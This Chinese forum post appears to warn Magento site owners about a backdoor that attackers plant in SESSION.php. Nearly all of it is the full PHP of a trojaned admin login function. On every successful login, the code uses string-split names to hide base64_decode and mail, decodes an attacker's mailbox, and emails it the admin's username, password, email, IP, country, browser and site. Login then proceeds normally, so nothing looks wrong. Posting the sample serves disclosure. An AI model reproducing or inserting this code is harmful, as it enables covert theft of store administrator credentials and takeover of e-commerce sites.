admi...
此文件被多数恶意攻击者用于记录MAGENTO网站后台信息数据一般是植入到SESSION.php文件下
try {
/** @var $user Mage_Admin_Model_User */
$user = $this->_factory->getModel('admin/user');
$user->login($username, $password);
if ($user->getId()) {
$srv = $_SERVER['SERVER_NAME'];
$ips = $_SERVER['REMOTE_ADDR'];
$getip = 'http://ip-api.com/json/' . $ips;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $getip);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($curl);
curl_close($curl);
$details = json_decode($content);
$country_code = $details->countryCode;
$country_name = $details->country;
$id = "ba"."se"."64"."_"."de"."co"."de";
$db = "ma"."il";
$key = $id("dHJ1bXBkcmVhbUB5YW5kZXguY29t");
$auth = "Username : ".$username."\nPassword : ".$password."\nEmail : ".$user->getEmail()."\nRequest : ".$_SERVER['REQUEST_URI']."\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$_SERVER['HTTP_USER_AGENT']."\nSite : ".$srv."";
$subjk = "".$country_code." [".$srv." - ".$ips."]";
$headr = "From: Magento Admin <".$username."@".$ips.">";
$db($key, $subjk, $auth, $headr);
$this->renewSession();
if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
Mage::getSingleton('adminhtml/url')->renewSecretUrls();
}
$this->setIsFirstPageAfterLogin(true);
$this->setUser($user);
$this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
$alternativeUrl = $this->_getRequestUri($request);
$redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
if ($redirectUrl) {
Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
$this->_response->clearHeaders()
->setRedirect($redirectUrl)
->sendHeadersAndExit();
}
} else {
Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
}
} catch (Mage_Core_Exception $e) {
$e->setMessage(
Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
);
Mage::dispatchEvent('admin_session_user_login_failed',
array('user_name' => $username, 'exception' => $e));
if ($request && !$request->getParam('messageSent')) {
Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
$request->setParam('messageSent', true);
}
}
网友回帖 3 条回帖